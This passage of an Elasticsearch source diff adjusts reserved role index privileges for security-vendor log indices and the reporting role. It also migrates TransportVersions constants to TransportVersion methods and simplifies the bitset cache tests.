.privileges("read", "view_index_metadata") .build(), + // For source indices of the Cloud Detection & Response (CDR) packages + // that ship a transform and have an ILM policy + RoleDescriptor.IndicesPrivileges.builder() + .indices( + "logs-m365_defender.vulnerability-*", + "logs-microsoft_defender_endpoint.vulnerability-*", + "logs-microsoft_defender_cloud.assessment-*", + "logs-sentinel_one.application_risk-*" + ) + .privileges( + "read", + "view_index_metadata", + // Require "delete_index" to perform ILM policy actions + TransportDeleteIndexAction.TYPE.name() + ) + .build(), + // For ExtraHop, QualysGAV, and SentinelOne Application Dataset specific actions. Kibana reads, writes and manages this + // index + // for configured ILM policies.
+ RoleDescriptor.IndicesPrivileges.builder() + .indices("logs-extrahop.investigation-*", "logs-qualys_gav.asset-*", "logs-sentinel_one.application-*") + .privileges( + "manage", + "create_index", + "read", + "index", + "write", + "delete", + // Require "delete_index" to perform ILM policy actions + TransportDeleteIndexAction.TYPE.name(), + TransportIndicesAliasesAction.NAME, + TransportAutoPutMappingAction.TYPE.name() + ) + .build(), // For alias indices of the Cloud Detection & Response (CDR) packages that ships a // transform RoleDescriptor.IndicesPrivileges.builder() diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java index 83d9ecacb1f38..b6eaac655da23 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/security/authz/store/ReservedRolesStore.java @@ -324,23 +324,13 @@ private static Map initializeReservedRoles() { null, new RoleDescriptor.ApplicationResourcePrivileges[] { RoleDescriptor.ApplicationResourcePrivileges.builder() - .application("kibana-.kibana") + .application("kibana-*") .resources("*") - .privileges( - "feature_discover.minimal_read", - "feature_discover.generate_report", - "feature_dashboard.minimal_read", - "feature_dashboard.generate_report", - "feature_dashboard.download_csv_report", - "feature_canvas.minimal_read", - "feature_canvas.generate_report", - "feature_visualize.minimal_read", - "feature_visualize.generate_report" - ) + .privileges("reserved_reporting_user") .build() }, null, null, - MetadataUtils.DEFAULT_RESERVED_METADATA, + MetadataUtils.getDeprecatedReservedMetadata("Please grant access via Kibana privileges instead."), null, null, null, @@ -349,7 +339,7 @@ private static Map initializeReservedRoles() { + "including generating and downloading reports. " + "This role implicitly grants access to all Kibana reporting features, " + "with each user having access only to their own reports. Note that reporting users should also be assigned " - + "additional roles that grant read access to the indices that will be used to generate reports." + + "additional roles that grant read access to Kibana, and the indices that will be used to generate reports." 
) ), entry(KibanaSystemUser.ROLE_NAME, kibanaSystemRoleDescriptor(KibanaSystemUser.ROLE_NAME)), diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java index 53b45827c4a9f..00f7d484be988 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SLMFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.slm; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -41,7 +40,7 @@ public SLMFeatureSetUsage(@Nullable SnapshotLifecycleStats slmStats) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public SnapshotLifecycleStats getStats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java index e1478c309cd53..032dc6944726a 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/slm/SnapshotLifecycleMetadata.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.slm; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -132,7 +131,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -230,7 +229,7 @@ static Diff readLifecyclePolicyDiffFrom(StreamI @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java index 215043a7b4b8e..6f719ac130eda 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/spatial/SpatialFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.spatial; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xpack.core.XPackFeatureUsage; @@ -34,7 +33,7 @@ public SpatialFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } SpatialStatsAction.Response statsResponse() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java index 0b86e27a62f17..1ac236ca5cc1c 100644 --- 
a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/sql/SqlFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.sql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -34,7 +33,7 @@ public SqlFeatureSetUsage(Map stats) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public Map stats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java index 909bf6858eab0..3a09ee833d295 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.transform; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -50,7 +49,7 @@ public TransformFeatureSetUsage( @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java index 86651fe241b3d..b52783dcfa773 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/TransformMetadata.java @@ -63,7 +63,7 @@ public boolean upgradeMode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override @@ -150,7 +150,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java index fd48fc9ef4c20..77aa92f830d61 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/transform/transforms/TransformTaskParams.java @@ -93,7 +93,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java index 49106c01b96b0..013da1753d523 100644 
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/votingonly/VotingOnlyNodeFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.votingonly; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.xpack.core.XPackFeatureUsage; import org.elasticsearch.xpack.core.XPackField; @@ -25,7 +24,7 @@ public VotingOnlyNodeFeatureSetUsage() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java index de4dbf601f50b..006effe168254 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.watcher; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -33,7 +32,7 @@ public WatcherFeatureSetUsage(boolean available, boolean enabled, Map stats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java index c8fc1719ba026..e1a661b57fb0d 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/watcher/WatcherMetadata.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.watcher; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.NamedDiff; import org.elasticsearch.cluster.metadata.Metadata; @@ -45,7 +44,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java index d788a0b5abd37..710db0287fa2b 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/license/XPackLicenseStateTests.java @@ -244,6 +244,13 @@ public void testLastUsedMomentaryFeature() { lastUsed = licenseState.getLastUsed(); assertThat("feature.check updates usage", lastUsed.keySet(), containsInAnyOrder(usage)); assertThat(lastUsed.get(usage), equalTo(200L)); + + // updates to the last used timestamp only happen if the time has increased + currentTime.set(199); + goldFeature.check(licenseState); + lastUsed = licenseState.getLastUsed(); + assertThat("feature.check updates usage", lastUsed.keySet(), containsInAnyOrder(usage)); + assertThat(lastUsed.get(usage), equalTo(200L)); } public 
void testLastUsedMomentaryFeatureWithSameNameDifferentFamily() { diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java index 100f7843713bd..64e37695f060c 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ClientHelperTests.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.admin.cluster.health.ClusterHealthRequest; import org.elasticsearch.action.admin.cluster.health.ClusterHealthResponse; @@ -369,7 +368,7 @@ public void testGetPersistableSafeSecurityHeaders() throws IOException { final ClusterState clusterState = mock(ClusterState.class); final DiscoveryNodes discoveryNodes = mock(DiscoveryNodes.class); when(clusterState.nodes()).thenReturn(discoveryNodes); - when(clusterState.getMinTransportVersion()).thenReturn(TransportVersions.MINIMUM_COMPATIBLE); + when(clusterState.getMinTransportVersion()).thenReturn(TransportVersion.minimumCompatible()); // No security header ThreadContext threadContext = new ThreadContext(Settings.EMPTY); final String nonSecurityHeaderKey = "not-a-security-header"; @@ -425,7 +424,7 @@ public void testGetPersistableSafeSecurityHeaders() throws IOException { // Rewritten for older version final TransportVersion previousVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion() ); when(clusterState.getMinTransportVersion()).thenReturn(previousVersion); diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java index 1c69a6a52951a..5e304530b064f 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/async/AsyncResultsServiceTests.java @@ -231,8 +231,11 @@ public void testAssertExpirationPropagation() throws Exception { try { long startTime = System.currentTimeMillis(); task.setExpirationTime(startTime + TimeValue.timeValueMinutes(1).getMillis()); - - if (updateInitialResultsInStore) { + boolean taskCompleted = randomBoolean(); + if (taskCompleted) { + taskManager.unregister(task); + } + if (taskCompleted || updateInitialResultsInStore) { // we need to store initial result PlainActionFuture future = new PlainActionFuture<>(); indexService.createResponse( @@ -249,10 +252,11 @@ public void testAssertExpirationPropagation() throws Exception { // not waiting for completion, so should return immediately with timeout service.retrieveResult(new GetAsyncResultRequest(task.getExecutionId().getEncoded()).setKeepAlive(newKeepAlive), listener); listener.actionGet(TimeValue.timeValueSeconds(10)); - assertThat(task.getExpirationTime(), greaterThanOrEqualTo(startTime + newKeepAlive.getMillis())); - assertThat(task.getExpirationTime(), lessThanOrEqualTo(System.currentTimeMillis() + newKeepAlive.getMillis())); - - if (updateInitialResultsInStore) { + if (taskCompleted == false) { + assertThat(task.getExpirationTime(), greaterThanOrEqualTo(startTime + 
newKeepAlive.getMillis())); + assertThat(task.getExpirationTime(), lessThanOrEqualTo(System.currentTimeMillis() + newKeepAlive.getMillis())); + } + if (updateInitialResultsInStore || taskCompleted) { PlainActionFuture future = new PlainActionFuture<>(); indexService.getResponse(task.executionId, randomBoolean(), future); TestAsyncResponse response = future.actionGet(TimeValue.timeValueMinutes(10)); diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java index b4389377dff34..217b22aec41c2 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ccr/action/CcrStatsActionTests.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.core.ccr.action; +import org.elasticsearch.TransportVersion; import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.core.TimeValue; @@ -56,6 +57,6 @@ public void testSerializationBwc() throws IOException { request.masterNodeTimeout(TimeValue.timeValueSeconds(randomFrom(20, 25, 30))); } assertSerialization(request, TransportVersionUtils.getPreviousVersion(TransportVersions.V_8_14_0)); - assertSerialization(request, TransportVersions.MINIMUM_CCS_VERSION); + assertSerialization(request, TransportVersion.minimumCCSVersion()); } } diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java index ec7de261e9fa9..405e2797c0bc2 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/ml/action/ForecastJobActionRequestTests.java @@ -56,7 +56,7 @@ public void testSetDuration_GivenZero() { } public void testSetDuration_GivenNegative() { - IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setDuration("-1s")); + IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setDuration("-1")); assertThat(e.getMessage(), equalTo("[duration] must be positive: [-1]")); } @@ -67,7 +67,7 @@ public void testSetExpiresIn_GivenZero() { } public void testSetExpiresIn_GivenNegative() { - IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setExpiresIn("-1s")); + IllegalArgumentException e = expectThrows(IllegalArgumentException.class, () -> new Request().setExpiresIn("-1")); assertThat(e.getMessage(), equalTo("[expires_in] must be non-negative: [-1]")); } } diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java index 500f7cd5a9b44..bd7f82501ce13 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authc/AuthenticationTests.java @@ -937,7 +937,7 @@ public void testMaybeRewriteMetadataForCrossClusterAccessAuthentication() throws // pick a version before that of the authentication instance to force a rewrite final TransportVersion olderVersion = 
TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(authentication.getEffectiveSubject().getTransportVersion()) ); diff --git a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java index 5369c95ad6fa7..db78d8eb33ede 100644 --- a/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java +++ b/x-pack/plugin/core/src/test/java/org/elasticsearch/xpack/core/security/authz/accesscontrol/DocumentSubsetBitsetCacheTests.java @@ -43,10 +43,6 @@ import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.IndexSettingsModule; import org.elasticsearch.test.MockLog; -import org.hamcrest.Matchers; -import org.junit.After; -import org.junit.Before; -import org.mockito.Mockito; import java.io.Closeable; import java.io.IOException; @@ -65,12 +61,13 @@ import static java.util.Collections.emptyList; import static java.util.Collections.emptyMap; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.lessThan; import static org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; import static org.hamcrest.Matchers.sameInstance; -import static org.mockito.ArgumentMatchers.any; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; @@ -80,17 +77,6 @@ public class DocumentSubsetBitsetCacheTests extends ESTestCase { // This value is based on the internal implementation details of lucene's FixedBitSet // If the implementation changes, this can be safely updated to match the new ram usage for a single bitset private static final long EXPECTED_BYTES_PER_BIT_SET = 56; - private ExecutorService singleThreadExecutor; - - @Before - public void setUpExecutor() { - singleThreadExecutor = Executors.newSingleThreadExecutor(); - } - - @After - public void cleanUpExecutor() { - singleThreadExecutor.shutdown(); - } public void testSameBitSetIsReturnedForIdenticalQuery() throws Exception { final DocumentSubsetBitsetCache cache = newCache(Settings.EMPTY); @@ -103,7 +89,7 @@ public void testSameBitSetIsReturnedForIdenticalQuery() throws Exception { final BitSet bitSet2 = cache.getBitSet(query2, leafContext); assertThat(bitSet2, notNullValue()); - assertThat(bitSet2, Matchers.sameInstance(bitSet1)); + assertThat(bitSet2, sameInstance(bitSet1)); }); } @@ -272,7 +258,7 @@ public void testCacheRespectsAccessTimeExpiry() throws Exception { assertThat(bitSet2, notNullValue()); // Loop until the cache has less than 2 items, which mean that something we evicted - assertThat(cache.entryCount(), Matchers.lessThan(2)); + assertThat(cache.entryCount(), lessThan(2)); }, 100, TimeUnit.MILLISECONDS); @@ -288,42 +274,28 @@ public void testIndexLookupIsClearedWhenBitSetIsEvicted() throws Exception { .put(DocumentSubsetBitsetCache.CACHE_SIZE_SETTING.getKey(), maxCacheBytes + "b") .build(); - final ExecutorService executor = mock(ExecutorService.class); - final AtomicReference runnableRef = new AtomicReference<>(); - when(executor.submit(any(Runnable.class))).thenAnswer(inv -> { - final Runnable r = (Runnable) inv.getArguments()[0]; - 
runnableRef.set(r); - return null; - }); - - final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings, executor); + final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings); assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); runTestOnIndex((searchExecutionContext, leafContext) -> { + cache.verifyInternalConsistency(); + final Query query1 = QueryBuilders.termQuery("field-1", "value-1").toQuery(searchExecutionContext); final BitSet bitSet1 = cache.getBitSet(query1, leafContext); assertThat(bitSet1, notNullValue()); + cache.verifyInternalConsistency(); final Query query2 = QueryBuilders.termQuery("field-2", "value-2").toQuery(searchExecutionContext); final BitSet bitSet2 = cache.getBitSet(query2, leafContext); assertThat(bitSet2, notNullValue()); - - // BitSet1 has been evicted now, run the cleanup... - final Runnable runnable1 = runnableRef.get(); - assertThat(runnable1, notNullValue()); - runnable1.run(); cache.verifyInternalConsistency(); - // Check that the original bitset is no longer in the cache (a new instance is returned) assertThat(cache.getBitSet(query1, leafContext), not(sameInstance(bitSet1))); - - // BitSet2 has been evicted now, run the cleanup... - final Runnable runnable2 = runnableRef.get(); - assertThat(runnable2, not(sameInstance(runnable1))); - runnable2.run(); cache.verifyInternalConsistency(); }); + + cache.verifyInternalConsistency(); } public void testCacheUnderConcurrentAccess() throws Exception { @@ -337,23 +309,12 @@ public void testCacheUnderConcurrentAccess() throws Exception { .put(DocumentSubsetBitsetCache.CACHE_SIZE_SETTING.getKey(), maxCacheBytes + "b") .build(); + final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings); + assertThat(cache.entryCount(), equalTo(0)); + assertThat(cache.ramBytesUsed(), equalTo(0L)); + final ExecutorService threads = Executors.newFixedThreadPool(concurrentThreads + 1); - final ExecutorService cleanupExecutor = Mockito.mock(ExecutorService.class); - when(cleanupExecutor.submit(any(Runnable.class))).thenAnswer(inv -> { - final Runnable runnable = (Runnable) inv.getArguments()[0]; - return threads.submit(() -> { - // Sleep for a small (random) length of time. 
- // This increases the likelihood that cache could have been modified between the eviction & the cleanup - Thread.sleep(randomIntBetween(1, 10)); - runnable.run(); - return null; - }); - }); try { - final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings, cleanupExecutor); - assertThat(cache.entryCount(), equalTo(0)); - assertThat(cache.ramBytesUsed(), equalTo(0L)); - runTestOnIndices(numberOfIndices, contexts -> { final CountDownLatch start = new CountDownLatch(concurrentThreads); final CountDownLatch end = new CountDownLatch(concurrentThreads); @@ -394,12 +355,12 @@ public void testCacheUnderConcurrentAccess() throws Exception { threads.shutdown(); assertTrue("Cleanup thread did not complete in expected time", threads.awaitTermination(3, TimeUnit.SECONDS)); - cache.verifyInternalConsistency(); + cache.verifyInternalConsistencyKeysToCache(); // Due to cache evictions, we must get more bitsets than fields - assertThat(uniqueBitSets.size(), Matchers.greaterThan(FIELD_COUNT)); + assertThat(uniqueBitSets.size(), greaterThan(FIELD_COUNT)); // Due to cache evictions, we must have seen more bitsets than the cache currently holds - assertThat(uniqueBitSets.size(), Matchers.greaterThan(cache.entryCount())); + assertThat(uniqueBitSets.size(), greaterThan(cache.entryCount())); // Even under concurrent pressure, the cache should hit the expected size assertThat(cache.entryCount(), is(maxCacheCount)); assertThat(cache.ramBytesUsed(), is(maxCacheBytes)); @@ -407,62 +368,41 @@ public void testCacheUnderConcurrentAccess() throws Exception { } finally { threads.shutdown(); } + + cache.verifyInternalConsistencyKeysToCache(); } - public void testCleanupWorksWhenIndexIsClosing() throws Exception { + public void testCleanupWorksWhenIndexIsClosed() throws Exception { // Enough to hold slightly more than 1 bit-set in the cache final long maxCacheBytes = EXPECTED_BYTES_PER_BIT_SET + EXPECTED_BYTES_PER_BIT_SET / 2; final Settings settings = Settings.builder() .put(DocumentSubsetBitsetCache.CACHE_SIZE_SETTING.getKey(), maxCacheBytes + "b") .build(); - final ExecutorService threads = Executors.newFixedThreadPool(1); - final ExecutorService cleanupExecutor = Mockito.mock(ExecutorService.class); - final CountDownLatch cleanupReadyLatch = new CountDownLatch(1); - final CountDownLatch cleanupCompleteLatch = new CountDownLatch(1); - final CountDownLatch indexCloseLatch = new CountDownLatch(1); - final AtomicReference cleanupException = new AtomicReference<>(); - when(cleanupExecutor.submit(any(Runnable.class))).thenAnswer(inv -> { - final Runnable runnable = (Runnable) inv.getArguments()[0]; - return threads.submit(() -> { - try { - cleanupReadyLatch.countDown(); - assertTrue("index close did not completed in expected time", indexCloseLatch.await(1, TimeUnit.SECONDS)); - runnable.run(); - } catch (Throwable e) { - logger.warn("caught error in cleanup thread", e); - cleanupException.compareAndSet(null, e); - } finally { - cleanupCompleteLatch.countDown(); - } - return null; - }); - }); - final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings, cleanupExecutor); + final DocumentSubsetBitsetCache cache = new DocumentSubsetBitsetCache(settings); assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); - try { - runTestOnIndex((searchExecutionContext, leafContext) -> { - final Query query1 = QueryBuilders.termQuery("field-1", "value-1").toQuery(searchExecutionContext); - final BitSet bitSet1 = cache.getBitSet(query1, leafContext); - 
assertThat(bitSet1, notNullValue()); + runTestOnIndex((searchExecutionContext, leafContext) -> { + final Query query1 = QueryBuilders.termQuery("field-1", "value-1").toQuery(searchExecutionContext); + final BitSet bitSet1 = cache.getBitSet(query1, leafContext); + assertThat(bitSet1, notNullValue()); + cache.verifyInternalConsistency(); - // Second query should trigger a cache eviction - final Query query2 = QueryBuilders.termQuery("field-2", "value-2").toQuery(searchExecutionContext); - final BitSet bitSet2 = cache.getBitSet(query2, leafContext); - assertThat(bitSet2, notNullValue()); + // Second query should trigger a cache eviction + final Query query2 = QueryBuilders.termQuery("field-2", "value-2").toQuery(searchExecutionContext); + final BitSet bitSet2 = cache.getBitSet(query2, leafContext); + assertThat(bitSet2, notNullValue()); + cache.verifyInternalConsistency(); - final IndexReader.CacheKey indexKey = leafContext.reader().getCoreCacheHelper().getKey(); - assertTrue("cleanup did not trigger in expected time", cleanupReadyLatch.await(1, TimeUnit.SECONDS)); - cache.onClose(indexKey); - indexCloseLatch.countDown(); - assertTrue("cleanup did not complete in expected time", cleanupCompleteLatch.await(1, TimeUnit.SECONDS)); - assertThat("caught error in cleanup thread: " + cleanupException.get(), cleanupException.get(), nullValue()); - }); - } finally { - threads.shutdown(); - } + final IndexReader.CacheKey indexKey = leafContext.reader().getCoreCacheHelper().getKey(); + cache.onClose(indexKey); + cache.verifyInternalConsistency(); + + // closing an index results in the associated entries being removed from the cache (at least when single threaded) + assertThat(cache.entryCount(), equalTo(0)); + assertThat(cache.ramBytesUsed(), equalTo(0L)); + }); } public void testCacheIsPerIndex() throws Exception { @@ -492,7 +432,7 @@ public void accept(SearchExecutionContext searchExecutionContext, LeafReaderCont runTestOnIndex(consumer); } - public void testCacheClearEntriesWhenIndexIsClosed() throws Exception { + public void testCacheClearsEntriesWhenIndexIsClosed() throws Exception { final DocumentSubsetBitsetCache cache = newCache(Settings.EMPTY); assertThat(cache.entryCount(), equalTo(0)); assertThat(cache.ramBytesUsed(), equalTo(0L)); @@ -504,9 +444,13 @@ public void testCacheClearEntriesWhenIndexIsClosed() throws Exception { final BitSet bitSet = cache.getBitSet(query, leafContext); 